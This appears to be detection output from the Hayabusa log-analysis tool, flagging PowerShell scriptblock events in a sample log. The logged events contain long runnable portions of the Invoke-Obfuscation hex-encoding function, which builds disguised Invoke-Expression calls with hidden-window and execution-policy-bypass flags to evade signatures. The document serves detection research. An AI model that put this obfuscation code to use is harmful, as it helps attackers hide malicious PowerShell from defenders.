$RandomDelimitersToPrintForDashSplit = '' ForEach($RandomDelimiter in $RandomDelimiters) { # Random case 'split' string. $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += ('-' + $Split + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1))) } $RandomDelimitersToPrintForDashSplit = $RandomDelimitersToPrintForDashSplit.Trim() # Randomly select between various conversion syntax options. $RandomStringSyntax = ([Char[]](Get-Random -Input @('[String]$_','$_.ToString()')) | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomConversionSyntax = @() $RandomConversionSyntax += ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' $RandomConversionSyntax += $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input @('-as','-As','-aS','-AS')) + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"" $RandomConversionSyntax = (Get-Random -Input $RandomConversionSyntax) # Create array syntax for encoded $ScriptString as alternative to .Split/-Split syntax. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object { # Encapsulate current item with single quote if it contains a non-integer. 
If([Convert]::ToString(([Int][Char]$_),$EncodingBase).Trim('0123456789').Length -gt 0) {$Quote = ""'""} Else {$Quote = ''} $EncodedArray += ($Quote + [Convert]::ToString(([Int][Char]$_),$EncodingBase) + $Quote + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1))) } # Remove trailing comma from $EncodedArray. $EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. # If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. 
$SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate the code that will decrypt and execute the payload and randomly select one. $BaseScriptArray = @() $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'."" + $Split + ""("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimitersToPrint + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'"" + ' '*(Get-Random -Input @(0,1)) + $RandomDelimitersToPrintForDashSplit + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' # Generate random JOIN syntax for all above options. 
$NewScriptArray = @() $NewScriptArray += (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray += $Join + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) $NewScriptArray += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script w",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.258 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. 
# You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedHexCommand { <# .SYNOPSIS Generates hexadecimal encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedHexCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedHexCommand encodes an input PowerShell scriptblock or path as a hexadecimal payload. It randomly chooses between .Split/-Split/array syntax to store the encoded payload in the final output. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. 
.PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedHexCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NonInt -NoPr ""('57_72}69R74u65P2dR48T6fu73_74;20_27R48T65R6cR6c;6fT20;57}6fP72}6cT64u21;27}20}2dP46T6f}72u65{67T72}6f_75}6e{64P43_6f_6cR6f{72u20;47T72{65T65}6eT3b}20T57_72P69u74u65P2dT48T6fR73;74;20P27T4fu62;66P75{73R63}61}74{69R6fu6eT20T52u6fT63u6b;73u21;27}20;2d;46R6fT72T65P67P72R6fP75{6e}64T43_6fP6cR6f{72;20T47T72T65{65}6e'-SPLiT'P'-SpliT'}'-SPLIt 'u'-SpLIt'{'-SPLit'R' -SplIT '_'-SpliT'T' -SplIt';'| ForEach-Object { ([Convert]::ToInt16(( $_.ToString()),16)-AS[Char]) }) -Join ''|Invoke-Expression"" C:\PS> Out-EncodedHexCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green} -NoProfile -NonInteractive -PassThru -Join (( 57,72 , 69 , 74 , 65, '2d', 48, '6f', 73 ,74, 20, 27 ,48, 65, '6c', '6c','6f', 20,57 , '6f',72,'6c' , 64 ,21 , 27 , 20 ,'2d', 46,'6f', 72 ,65 ,67, 72, '6f', 75 ,'6e', 64 ,43,'6f' , '6c' ,'6f' , 72,20 ,47 , 72 , 65, 65,'6e','3b', 20, 57 ,72,69 ,74 ,65,'2d',48 ,'6f' ,73, 74 ,20 , 27,'4f' ,62, 66,75 , 73 ,63 ,61 ,74 , 69 , '6f' , '6e', 20,52 , '6f',63 , '6b' , 73,21,27 , 20, '2d' ,46 ,'6f', 72,65 ,67, 72 ,'6f' ,75 ,'6e' , 64 , 43,'6f' ,'6c' , '6f' , 72 ,20, 47,72,65 , 65, '6e') |ForEach-Object{ ([Char]([Convert]::ToInt16( ([String]$_) ,16))) })|IEX .NOTES Inspiration for this encoding technique came from: https://blogs.technet.microsoft.com/heyscriptingguy/2011/09/09/convert-hexadecimal-to-ascii-using-powershell/ This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Encoding base values: 16=Hex, 8=Octal, 2=Binary $EncodingBase = 16 # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Create list of random delimiters $RandomDelimiters. # Avoid using . 
* ' "" [ ] ( ) etc. as delimiters as these will cause problems in the -Split command syntax. $RandomDelimiters = @('_','-',',','{','}','~','!','@','%','&','<','>',';',':') # Add letters g-z with random case to $RandomDelimiters (avoiding a-f as it will be used for Hexadecimal values). @('g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') | ForEach-Object {$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar} # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output. $RandomDelimiters = (Get-Random -Input $RandomDelimiters -Count ($RandomDelimiters.Count/4)) # Convert $ScriptString to delimited Hex values in [Char] array separated by random delimiter from defined list $RandomDelimiters. $DelimitedEncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$DelimitedEncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + (Get-Random -Input $RandomDelimiters))} # Remove trailing delimiter from $DelimitedEncodedArray. $DelimitedEncodedArray = $DelimitedEncodedArray.SubString(0,$DelimitedEncodedArray.Length-1) # Create printable version of $RandomDelimiters in random order to be used by final command. $RandomDelimitersToPrint = (Get-Random -Input $RandomDelimiters -Count $RandomDelimiters.Length) -Join '' # Generate random case versions for necessary operations. 
$ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ToInt16 = ([Char[]]'[Convert]::ToInt16(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax. $RandomDelimitersToPrintForDashSplit = '' ForEach($RandomDelimiter in $RandomDelimiters) { # Random case 'split' string. $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += ('-' + $Split + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1))) } $RandomDelimitersToPrintForDashSplit = $RandomDelimitersToPrintForDashSplit.Trim() # Randomly select between various conversion syntax options. 
$RandomStringSyntax = ([Char[]](Get-Random -Input @('[String]$_','$_.ToString()')) | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomConversionSyntax = @() $RandomConversionSyntax += ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' $RandomConversionSyntax += $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input @('-as','-As','-aS','-AS')) + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"" $RandomConversionSyntax = (Get-Random -Input $RandomConversionSyntax) # Create array syntax for encoded $ScriptString as alternative to .Split/-Split syntax. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object { # Encapsulate current item with single quote if it contains a non-integer. If([Convert]::ToString(([Int][Char]$_),$EncodingBase).Trim('0123456789').Length -gt 0) {$Quote = ""'""} Else {$Quote = ''} $EncodedArray += ($Quote + [Convert]::ToString(([Int][Char]$_),$EncodingBase) + $Quote + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1))) } # Remove trailing comma from $EncodedArray. $EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. 
# If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate the code that will decrypt and execute the payload and randomly select one. 
$BaseScriptArray = @() $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'."" + $Split + ""("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimitersToPrint + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'"" + ' '*(Get-Random -Input @(0,1)) + $RandomDelimitersToPrintForDashSplit + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' # Generate random JOIN syntax for all above options. 
$NewScriptArray = @() $NewScriptArray += (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray += $Join + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) $NewScriptArray += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script w",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.258 +00:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.258 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"ithout dependencies. 
$InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. 
$InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. 
$CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. 
Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. 
